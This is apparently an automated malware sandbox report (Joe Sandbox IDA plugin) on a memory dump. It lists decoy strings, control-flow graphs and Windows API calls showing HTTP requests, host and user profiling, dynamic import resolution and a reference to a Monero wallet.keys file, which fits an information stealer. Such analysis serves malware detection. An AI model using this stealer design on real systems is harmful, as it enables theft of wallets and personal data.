                                • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00DC4729
                                • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00DC477B
                                • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00DC4638
                                • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00DC4683
                                • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00DC466D
                                • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00DC4678
                                • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00DC4622
                                • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00DC45DD
                                • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00DC462D
                                • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00DC4643
                                • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00DC4662
                                • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00DC46CD
                                Memory Dump Source
                                • Source File: 00000000.00000002.1747144020.0000000000DC1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DC0000, based on PE: true
                                • Associated: 00000000.00000002.1747124751.0000000000DC0000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1747144020.0000000000E71000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1747144020.0000000000E7D000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1747144020.0000000000EA2000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1747144020.000000000100A000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1747340780.000000000101E000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1747340780.00000000011A1000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1747340780.000000000127B000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1747340780.000000000129F000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1747340780.00000000012A6000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1747340780.00000000012B5000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1747664665.00000000012B6000.00000080.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1747799643.000000000144C000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1747821540.000000000144D000.00000080.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_dc0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: AllocateHeapProtectVirtual
                                • String ID: The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the 
United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus 
Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.
                                • API String ID: 1542196881-2218711628
                                • Opcode ID: baaa0ed63d1495ba6c22674f8765b1a5f3b13de7b18ccc2181917c22f4a4960e
                                • Instruction ID: 0ae8bade20eb276808c9a17b2827dc0acaff3f49b7843672633f2ebd88964fb8
                                • Opcode Fuzzy Hash: baaa0ed63d1495ba6c22674f8765b1a5f3b13de7b18ccc2181917c22f4a4960e
                                • Instruction Fuzzy Hash: 984116207DB6946FCE24BBA5AC4EEAD7756FF4AF48F605848A80052286CBB06524C536

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 801 dc4880-dc4942 call dda7a0 call dc47b0 call dda740 * 5 InternetOpenA StrCmpCA 816 dc494b-dc494f 801->816 817 dc4944 801->817 818 dc4ecb-dc4ef3 InternetCloseHandle call ddaad0 call dc9ac0 816->818 819 dc4955-dc4acd call dd8b60 call dda920 call dda8a0 call dda800 * 2 call dda9b0 call dda8a0 call dda800 call dda9b0 call dda8a0 call dda800 call dda920 call dda8a0 call dda800 call dda9b0 call dda8a0 call dda800 call dda9b0 call dda8a0 call dda800 call dda9b0 call dda920 call dda8a0 call dda800 * 2 InternetConnectA 816->819 817->816 829 dc4ef5-dc4f2d call dda820 call dda9b0 call dda8a0 call dda800 818->829 830 dc4f32-dc4fa2 call dd8990 * 2 call dda7a0 call dda800 * 8 818->830 819->818 905 dc4ad3-dc4ad7 819->905 829->830 906 dc4ad9-dc4ae3 905->906 907 dc4ae5 905->907 908 dc4aef-dc4b22 HttpOpenRequestA 906->908 907->908 909 dc4ebe-dc4ec5 InternetCloseHandle 908->909 910 dc4b28-dc4e28 call dda9b0 call dda8a0 call dda800 call dda920 call dda8a0 call dda800 call dda9b0 call dda8a0 call dda800 call dda9b0 call dda8a0 call dda800 call dda9b0 call dda8a0 call dda800 call dda9b0 call dda8a0 call dda800 call dda920 call dda8a0 call dda800 call dda9b0 call dda8a0 call dda800 call dda9b0 call dda8a0 call dda800 call dda920 call dda8a0 call dda800 call dda9b0 call dda8a0 call dda800 call dda9b0 call dda8a0 call dda800 call dda9b0 call dda8a0 call dda800 call dda9b0 call dda8a0 call dda800 call dda920 call dda8a0 call dda800 call dda740 call dda920 * 2 call dda8a0 call dda800 * 2 call ddaad0 lstrlen call ddaad0 * 2 lstrlen call ddaad0 HttpSendRequestA 908->910 909->818 1021 dc4e32-dc4e5c InternetReadFile 910->1021 1022 dc4e5e-dc4e65 1021->1022 1023 dc4e67-dc4eb9 InternetCloseHandle call dda800 1021->1023 1022->1023 1024 dc4e69-dc4ea7 call dda9b0 call dda8a0 call dda800 1022->1024 1023->909 1024->1021
                                APIs
                                  • Part of subcall function 00DDA7A0: lstrcpy.KERNEL32(?,00000000), ref: 00DDA7E6
                                  • Part of subcall function 00DC47B0: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 00DC4839
                                  • Part of subcall function 00DC47B0: InternetCrackUrlA.WININET(00000000,00000000), ref: 00DC4849
                                  • Part of subcall function 00DDA740: lstrcpy.KERNEL32(00DE0E17,00000000), ref: 00DDA788
                                • InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 00DC4915
                                • StrCmpCA.SHLWAPI(?,0162EA98), ref: 00DC493A
                                • InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00DC4ABA
                                • lstrlen.KERNEL32(00000000,00000000,?,?,?,?,00DE0DDB,00000000,?,?,00000000,?,",00000000,?,0162EB08), ref: 00DC4DE8
                                • lstrlen.KERNEL32(00000000,00000000,00000000), ref: 00DC4E04
                                • HttpSendRequestA.WININET(00000000,00000000,00000000), ref: 00DC4E18
                                • InternetReadFile.WININET(00000000,?,000007CF,?), ref: 00DC4E49
                                • InternetCloseHandle.WININET(00000000), ref: 00DC4EAD
                                • InternetCloseHandle.WININET(00000000), ref: 00DC4EC5
                                • HttpOpenRequestA.WININET(00000000,0162E9D8,?,0162E278,00000000,00000000,00400100,00000000), ref: 00DC4B15
                                  • Part of subcall function 00DDA9B0: lstrlen.KERNEL32(?,01629208,?,\Monero\wallet.keys,00DE0E17), ref: 00DDA9C5
                                  • Part of subcall function 00DDA9B0: lstrcpy.KERNEL32(00000000), ref: 00DDAA04
                                  • Part of subcall function 00DDA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00DDAA12
                                  • Part of subcall function 00DDA8A0: lstrcpy.KERNEL32(?,00DE0E17), ref: 00DDA905
                                  • Part of subcall function 00DDA920: lstrcpy.KERNEL32(00000000,?), ref: 00DDA972
                                  • Part of subcall function 00DDA920: lstrcat.KERNEL32(00000000), ref: 00DDA982
                                • InternetCloseHandle.WININET(00000000), ref: 00DC4ECF
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1747144020.0000000000DC1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DC0000, based on PE: true
                                 • Associated: 00000000.00000002.1747124751.0000000000DC0000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1747144020.0000000000E71000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1747144020.0000000000E7D000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1747144020.0000000000EA2000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1747144020.000000000100A000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1747340780.000000000101E000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1747340780.00000000011A1000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1747340780.000000000127B000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1747340780.000000000129F000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1747340780.00000000012A6000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1747340780.00000000012B5000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1747664665.00000000012B6000.00000080.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1747799643.000000000144C000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1747821540.000000000144D000.00000080.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_dc0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: Internet$lstrcpy$lstrlen$CloseHandle$HttpOpenRequestlstrcat$ConnectCrackFileReadSend
                                • String ID: "$"$------$------$------
                                • API String ID: 460715078-2180234286
                                • Opcode ID: 6f28e7f2eb6eebd547abfee45271e1bf32208405f78eadd9be72ddbf6e5e364c
                                • Instruction ID: c051403d90109bf70ee4f28ffda8599f9c9c3867ab44001fb161ead1cd363a8b
                                • Opcode Fuzzy Hash: 6f28e7f2eb6eebd547abfee45271e1bf32208405f78eadd9be72ddbf6e5e364c
                                • Instruction Fuzzy Hash: 7512EA71910258AADB25EB94DCA2FEEB378EF14300F50819AB50663191EF702F49DF76
                                APIs
                                • GetProcessHeap.KERNEL32(00000000,00000104), ref: 00DD7910
                                • RtlAllocateHeap.NTDLL(00000000), ref: 00DD7917
                                • GetComputerNameA.KERNEL32(?,00000104), ref: 00DD792F
                                Memory Dump Source
                                • Source File: 00000000.00000002.1747144020.0000000000DC1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DC0000, based on PE: true
                                 • Associated: 00000000.00000002.1747124751.0000000000DC0000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1747144020.0000000000E71000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1747144020.0000000000E7D000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1747144020.0000000000EA2000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1747144020.000000000100A000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1747340780.000000000101E000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1747340780.00000000011A1000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1747340780.000000000127B000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1747340780.000000000129F000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1747340780.00000000012A6000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1747340780.00000000012B5000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1747664665.00000000012B6000.00000080.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1747799643.000000000144C000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1747821540.000000000144D000.00000080.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_dc0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: Heap$AllocateComputerNameProcess
                                • String ID:
                                • API String ID: 1664310425-0
                                • Opcode ID: fd69d95d18cbac0d76dc3ee4430b2356a71b90f597e93d99199fdc2b77fcf74a
                                • Instruction ID: 5a0e59e63811d1e623d0748ea0960e463f6ac9199b47ae3ef78b52c40d2793ff
                                • Opcode Fuzzy Hash: fd69d95d18cbac0d76dc3ee4430b2356a71b90f597e93d99199fdc2b77fcf74a
                                • Instruction Fuzzy Hash: 920186B1A44308EFC710DF95D945BAEBBB8F704B21F10425AF585E3380D37559048BB1
                                APIs
                                • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,00DC11B7), ref: 00DD7880
                                • RtlAllocateHeap.NTDLL(00000000), ref: 00DD7887
                                • GetUserNameA.ADVAPI32(00000104,00000104), ref: 00DD789F
                                Memory Dump Source
                                • Source File: 00000000.00000002.1747144020.0000000000DC1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DC0000, based on PE: true
                                 • Associated: 00000000.00000002.1747124751.0000000000DC0000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1747144020.0000000000E71000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1747144020.0000000000E7D000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1747144020.0000000000EA2000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1747144020.000000000100A000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1747340780.000000000101E000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1747340780.00000000011A1000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1747340780.000000000127B000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1747340780.000000000129F000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1747340780.00000000012A6000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1747340780.00000000012B5000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1747664665.00000000012B6000.00000080.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1747799643.000000000144C000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1747821540.000000000144D000.00000080.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_dc0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: Heap$AllocateNameProcessUser
                                • String ID:
                                • API String ID: 1296208442-0
                                • Opcode ID: 561c93f3623fd9a665a0837e1a327c28c6057c3bef412e2f386188e3e33ea492
                                • Instruction ID: 302a980f1e1ef6d89007b8175eacfa870875b3cc95e9c98da46f7e337943c90a
                                • Opcode Fuzzy Hash: 561c93f3623fd9a665a0837e1a327c28c6057c3bef412e2f386188e3e33ea492
                                • Instruction Fuzzy Hash: 07F04FB1E44208EFCB10DF98DD49BAEBBB8FB04721F10025AFA45A3780C77955048BA1
                                APIs
                                Memory Dump Source
                                • Source File: 00000000.00000002.1747144020.0000000000DC1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DC0000, based on PE: true
                                 • Associated: 00000000.00000002.1747124751.0000000000DC0000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1747144020.0000000000E71000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1747144020.0000000000E7D000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1747144020.0000000000EA2000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1747144020.000000000100A000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1747340780.000000000101E000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1747340780.00000000011A1000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1747340780.000000000127B000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1747340780.000000000129F000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1747340780.00000000012A6000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1747340780.00000000012B5000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1747664665.00000000012B6000.00000080.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1747799643.000000000144C000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1747821540.000000000144D000.00000080.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_dc0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: ExitInfoProcessSystem
                                • String ID:
                                • API String ID: 752954902-0
                                • Opcode ID: a102d64594b41e17b2d21f8b321044a019b94ebb2d31f2e816f92f72147e748d
                                • Instruction ID: bcf9d190b7ebeb47fcf557b4758f46cf704878ee7d0835f9e331f4c5196e2ea7
                                • Opcode Fuzzy Hash: a102d64594b41e17b2d21f8b321044a019b94ebb2d31f2e816f92f72147e748d
                                • Instruction Fuzzy Hash: 1AD05E74A0430CDBCB10DFE0D849ADDBBB8FB08311F000658D90A63340EA355481CBA5

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 633 dd9c10-dd9c1a 634 dda036-dda0ca LoadLibraryA * 8 633->634 635 dd9c20-dda031 GetProcAddress * 43 633->635 636 dda0cc-dda141 GetProcAddress * 5 634->636 637 dda146-dda14d 634->637 635->634 636->637 638 dda216-dda21d 637->638 639 dda153-dda211 GetProcAddress * 8 637->639 640 dda21f-dda293 GetProcAddress * 5 638->640 641 dda298-dda29f 638->641 639->638 640->641 642 dda2a5-dda332 GetProcAddress * 6 641->642 643 dda337-dda33e 641->643 642->643 644 dda41f-dda426 643->644 645 dda344-dda41a GetProcAddress * 9 643->645 646 dda428-dda49d GetProcAddress * 5 644->646 647 dda4a2-dda4a9 644->647 645->644 646->647 648 dda4dc-dda4e3 647->648 649 dda4ab-dda4d7 GetProcAddress * 2 647->649 650 dda515-dda51c 648->650 651 dda4e5-dda510 GetProcAddress * 2 648->651 649->648 652 dda612-dda619 650->652 653 dda522-dda60d GetProcAddress * 10 650->653 651->650 654 dda67d-dda684 652->654 655 dda61b-dda678 GetProcAddress * 4 652->655 653->652 656 dda69e-dda6a5 654->656 657 dda686-dda699 GetProcAddress 654->657 655->654 658 dda708-dda709 656->658 659 dda6a7-dda703 GetProcAddress * 4 656->659 657->656 659->658
                                APIs
                                • GetProcAddress.KERNEL32(74DD0000,01615A70), ref: 00DD9C2D
                                • GetProcAddress.KERNEL32(74DD0000,01615790), ref: 00DD9C45
                                • GetProcAddress.KERNEL32(74DD0000,016296D0), ref: 00DD9C5E
                                • GetProcAddress.KERNEL32(74DD0000,01629628), ref: 00DD9C76
                                • GetProcAddress.KERNEL32(74DD0000,01629640), ref: 00DD9C8E
                                • GetProcAddress.KERNEL32(74DD0000,016296A0), ref: 00DD9CA7
                                • GetProcAddress.KERNEL32(74DD0000,0161B608), ref: 00DD9CBF
                                • GetProcAddress.KERNEL32(74DD0000,0162D008), ref: 00DD9CD7
                                • GetProcAddress.KERNEL32(74DD0000,0162CDF8), ref: 00DD9CF0
                                • GetProcAddress.KERNEL32(74DD0000,0162CFD8), ref: 00DD9D08
                                • GetProcAddress.KERNEL32(74DD0000,0162D0E0), ref: 00DD9D20
                                • GetProcAddress.KERNEL32(74DD0000,01615A90), ref: 00DD9D39
                                • GetProcAddress.KERNEL32(74DD0000,01615870), ref: 00DD9D51
                                • GetProcAddress.KERNEL32(74DD0000,016156B0), ref: 00DD9D69
                                • GetProcAddress.KERNEL32(74DD0000,01615710), ref: 00DD9D82
                                • GetProcAddress.KERNEL32(74DD0000,0162CE70), ref: 00DD9D9A
                                • GetProcAddress.KERNEL32(74DD0000,0162CEE8), ref: 00DD9DB2
                                • GetProcAddress.KERNEL32(74DD0000,0161B630), ref: 00DD9DCB
                                • GetProcAddress.KERNEL32(74DD0000,01615730), ref: 00DD9DE3
                                • GetProcAddress.KERNEL32(74DD0000,0162CFF0), ref: 00DD9DFB
                                • GetProcAddress.KERNEL32(74DD0000,0162CF78), ref: 00DD9E14
                                • GetProcAddress.KERNEL32(74DD0000,0162CE88), ref: 00DD9E2C
                                • GetProcAddress.KERNEL32(74DD0000,0162D038), ref: 00DD9E44
                                • GetProcAddress.KERNEL32(74DD0000,01615750), ref: 00DD9E5D
                                • GetProcAddress.KERNEL32(74DD0000,0162CF00), ref: 00DD9E75
                                • GetProcAddress.KERNEL32(74DD0000,0162CED0), ref: 00DD9E8D
                                • GetProcAddress.KERNEL32(74DD0000,0162CF18), ref: 00DD9EA6
                                • GetProcAddress.KERNEL32(74DD0000,0162CF90), ref: 00DD9EBE
                                • GetProcAddress.KERNEL32(74DD0000,0162CE58), ref: 00DD9ED6
                                • GetProcAddress.KERNEL32(74DD0000,0162D020), ref: 00DD9EEF
                                • GetProcAddress.KERNEL32(74DD0000,0162CF30), ref: 00DD9F07
                                • GetProcAddress.KERNEL32(74DD0000,0162CF48), ref: 00DD9F1F
                                • GetProcAddress.KERNEL32(74DD0000,0162D0B0), ref: 00DD9F38
                                • GetProcAddress.KERNEL32(74DD0000,0162A510), ref: 00DD9F50
                                • GetProcAddress.KERNEL32(74DD0000,0162CF60), ref: 00DD9F68
                                • GetProcAddress.KERNEL32(74DD0000,0162CFA8), ref: 00DD9F81
                                • GetProcAddress.KERNEL32(74DD0000,01615770), ref: 00DD9F99
                                • GetProcAddress.KERNEL32(74DD0000,0162CE10), ref: 00DD9FB1
                                • GetProcAddress.KERNEL32(74DD0000,016157B0), ref: 00DD9FCA
                                • GetProcAddress.KERNEL32(74DD0000,0162CEB8), ref: 00DD9FE2
                                • GetProcAddress.KERNEL32(74DD0000,0162CFC0), ref: 00DD9FFA
                                • GetProcAddress.KERNEL32(74DD0000,016157F0), ref: 00DDA013
                                • GetProcAddress.KERNEL32(74DD0000,01615DF0), ref: 00DDA02B
                                • LoadLibraryA.KERNEL32(0162D080,?,00DD5CA3,00DE0AEB,?,?,?,?,?,?,?,?,?,?,00DE0AEA,00DE0AE3), ref: 00DDA03D
                                • LoadLibraryA.KERNEL32(0162CE28,?,00DD5CA3,00DE0AEB,?,?,?,?,?,?,?,?,?,?,00DE0AEA,00DE0AE3), ref: 00DDA04E
                                • LoadLibraryA.KERNEL32(0162D050,?,00DD5CA3,00DE0AEB,?,?,?,?,?,?,?,?,?,?,00DE0AEA,00DE0AE3), ref: 00DDA060
                                • LoadLibraryA.KERNEL32(0162D068,?,00DD5CA3,00DE0AEB,?,?,?,?,?,?,?,?,?,?,00DE0AEA,00DE0AE3), ref: 00DDA072
                                • LoadLibraryA.KERNEL32(0162D098,?,00DD5CA3,00DE0AEB,?,?,?,?,?,?,?,?,?,?,00DE0AEA,00DE0AE3), ref: 00DDA083
                                • LoadLibraryA.KERNEL32(0162D0C8,?,00DD5CA3,00DE0AEB,?,?,?,?,?,?,?,?,?,?,00DE0AEA,00DE0AE3), ref: 00DDA095
                                • LoadLibraryA.KERNEL32(0162CE40,?,00DD5CA3,00DE0AEB,?,?,?,?,?,?,?,?,?,?,00DE0AEA,00DE0AE3), ref: 00DDA0A7
                                • LoadLibraryA.KERNEL32(0162CEA0,?,00DD5CA3,00DE0AEB,?,?,?,?,?,?,?,?,?,?,00DE0AEA,00DE0AE3), ref: 00DDA0B8
                                • GetProcAddress.KERNEL32(75290000,01615E30), ref: 00DDA0DA
                                • GetProcAddress.KERNEL32(75290000,0162D290), ref: 00DDA0F2
                                • GetProcAddress.KERNEL32(75290000,01629078), ref: 00DDA10A
                                • GetProcAddress.KERNEL32(75290000,0162D170), ref: 00DDA123
                                • GetProcAddress.KERNEL32(75290000,01615CB0), ref: 00DDA13B
                                • GetProcAddress.KERNEL32(73540000,0161B6D0), ref: 00DDA160
                                • GetProcAddress.KERNEL32(73540000,01615D30), ref: 00DDA179
                                • GetProcAddress.KERNEL32(73540000,0161B7C0), ref: 00DDA191
                                • GetProcAddress.KERNEL32(73540000,0162D218), ref: 00DDA1A9
                                • GetProcAddress.KERNEL32(73540000,0162D140), ref: 00DDA1C2
                                • GetProcAddress.KERNEL32(73540000,01615C50), ref: 00DDA1DA
                                • GetProcAddress.KERNEL32(73540000,01615C90), ref: 00DDA1F2
                                • GetProcAddress.KERNEL32(73540000,0162D278), ref: 00DDA20B
                                • GetProcAddress.KERNEL32(752C0000,01615D90), ref: 00DDA22C
                                • GetProcAddress.KERNEL32(752C0000,01615B10), ref: 00DDA244
                                • GetProcAddress.KERNEL32(752C0000,0162D350), ref: 00DDA25D
                                • GetProcAddress.KERNEL32(752C0000,0162D1A0), ref: 00DDA275
                                • GetProcAddress.KERNEL32(752C0000,01615B30), ref: 00DDA28D
                                • GetProcAddress.KERNEL32(74EC0000,0161B888), ref: 00DDA2B3
                                • GetProcAddress.KERNEL32(74EC0000,0161B9A0), ref: 00DDA2CB
                                • GetProcAddress.KERNEL32(74EC0000,0162D1D0), ref: 00DDA2E3
                                • GetProcAddress.KERNEL32(74EC0000,01615DD0), ref: 00DDA2FC
                                • GetProcAddress.KERNEL32(74EC0000,01615C70), ref: 00DDA314
                                • GetProcAddress.KERNEL32(74EC0000,0161B8D8), ref: 00DDA32C
